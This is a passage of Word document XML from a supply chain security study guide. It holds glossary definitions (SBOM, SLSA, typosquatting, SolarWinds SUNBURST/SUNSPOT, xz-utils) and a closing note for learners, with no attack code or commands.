          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Maintainer ownership transfer: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the social process of transferring package publication rights from one person to another; a supply-chain attack vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITM (Man-In-The-Middle): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an attack where an adversary intercepts communication between two parties to read or modify it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Provenance: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verifiable metadata about an artifact's origin, build history, and transformations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproducible build: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a build that produces bit-for-bit identical output when run in the same conditions by different parties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SBOM (Software Bill of Materials): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a formal inventory of the components of a software product, including transitive dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SLSA (Supply-chain Levels for Software Artifacts): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a graduated framework for build-system security with levels 1 through 4 indicating increasing rigor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SolarWinds: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the IT-management software vendor whose 2020 build-system compromise distributed backdoors to 18,000 organizations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source level: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the first level of the supply chain threat model; where code is authored and stored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Build level: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the level where source code becomes distributable artifacts; SolarWinds's compromise happened here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies level: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the level where external libraries and tools are consumed; event-stream and Log4Shell operated here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Distribution level: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the level where built artifacts are delivered to consumers; registry compromises and MITM happen here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime level: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the level where artifacts actually execute; vulnerability exploitation and configuration attacks manifest here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SUNBURST: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the backdoor payload delivered via the SolarWinds Orion update channel in 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SUNSPOT: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the build-system implant that injected SUNBURST into legitimate SolarWinds Orion builds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transitive dependency: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a dependency pulled in indirectly through another dependency; often invisible without explicit SBOM-style inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Typosquatting: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an attack where a malicious package is named similarly to a legitimate one to catch developers making typos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">xz-utils: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a compression utility that in 2024 was discovered to contain a multi-year-planned backdoor targeting OpenSSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Closing Note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supply chain security is, as disciplines go, young. The phrase itself was rarely used before 2020; the tooling is still evolving; the regulatory frameworks are being written in real time. You are learning the subject at a point when its shape is still being determined, and the tools available to defenders are significantly better than they were five years ago and almost certainly worse than they will be in five more.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The rest of this curriculum will give you the specific tools and practices available today. But understanding the threat — the five incidents in this module, the economic shift described in Chapter 7, the five-level model in Chapter 8 — is what lets you use those tools effectively rather than mechanically. The tools are means; the end is reducing the probability and impact of supply chain compromise on the systems you build and operate. Keep that end in mind as you work through the subsequent modules. The specific tools will change; the threat model will persist.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Supply Chain Security — Module 1: Supply Chain Attacks</dc:title>
  <dc:creator>Claude</dc:creator>
  <dc:description>Comprehensive study guide for Module 1: Supply Chain Attacks</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-17T06:52:57.929Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-17T06:52:57.930Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>